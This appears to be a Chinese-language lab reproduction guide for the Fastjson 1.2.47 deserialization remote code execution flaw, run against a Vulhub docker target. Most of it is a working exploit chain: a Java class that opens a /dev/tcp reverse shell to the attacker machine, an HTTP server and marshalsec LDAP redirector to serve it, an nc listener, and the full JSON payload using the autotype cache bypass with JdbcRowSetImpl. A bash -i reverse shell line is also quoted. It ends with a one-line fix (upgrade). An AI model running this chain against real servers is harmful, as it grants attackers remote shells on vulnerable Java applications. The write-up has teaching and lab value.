Fastjson≤1.2.47 RCE
一、漏洞介紹
fastjson 是阿里巴巴的開源JSON解析庫,它可以解析 JSON 格式的字符串,支持將 Java Bean 序列化爲 JSON 字符串,也可以從 JSON 字符串反序列化到 JavaBean。
首先,Fastjson提供了autotype功能,允許用戶在反序列化數據中通過“@type”指定反序列化的類型,其次,Fastjson自定義的反序列化機制時會調用指定類中的setter方法及部分getter方法,那麼當組件開啓了autotype功能並且反序列化不可信數據時,攻擊者可以構造數據,使目標應用的代碼執行流程進入特定類的特定setter或者getter方法中,若指定類的指定方法中有可被惡意利用的邏輯(也就是通常所指的“Gadget”),則會造成一些嚴重的安全問題。並且在Fastjson 1.2.47及以下版本中,利用其緩存機制可實現對未開啓autotype功能的繞過。
影響版本:
Fastjson1.2.47以及之前的版本
二、漏洞危害
遠程命令執行。
三、漏洞驗證
環境搭建:
實驗環境 | 系統 | IP地址 |
---|---|---|
攻擊機 | win10 | 192.168.134.130 |
靶機 | Centos7 | 192.168.134.133 |
docker pull vulhub/fastjson #拉取鏡像
docker run -d -p 8080:8080 -p 8443:8443 initidc/fastjson1.2.47_rce #連接容器
驗證一下環境是否正常:
漏洞復現
編譯生成payload
首先將以下代碼保存爲Exploit.java(反彈shell命令在代碼內,可自行調整)
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.134.130/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
然後編譯Exploit.java,會生成一個Exploit.class文件:
javac Exploit.java
攻擊機配置
-
使用python搭建一個臨時的web服務(執行命令的目錄即爲web根目錄):
python2 -m SimpleHTTPServer 1111
然後將編譯生成的Exploit.class文件放至web目錄下,即瀏覽器訪問會下載
此步是爲了接收LDAP服務重定向請求,需要在payload的目錄下開啓此web服務,這樣纔可以訪問到payload文件。
-
服務器使用marshalsec開啓LDAP服務監聽:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.134.130:1111/#Exploit 9999
使用marshalsec工具快捷的開啓LDAP服務,藉助LDAP服務將LDAP reference result 重定向到web服務器
-
nc監聽
nc -lvp 1888
最後訪問fastjson頁面,使用Burp抓包,改爲POST請求,使用EXP
POST /fastjson/ HTTP/1.1
Host: 192.168.134.133:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.134.130:9999/Exploit",
"autoCommit":true
}
}
發送後可以看到第三個窗口成功得到shell
注意:
- 在使用LDAP服務反彈shell用的命令不能直接使用
bash -i >& /dev/tcp/xx.xx.xx.xx/1888 0>&1
- jdk版本一定要注意!
啓動服務之前用 java -version查看自己的jdk版本是否低於以下jdk版本
四、漏洞修復
將Fastjson升級到最新版本
https://github.com/alibaba/fastjson
參考鏈接:
https://github.com/CaijiOrz/fastjson-1.2.47-RCE
https://github.com/ianxtianxt/Fastjson-1.2.47-rce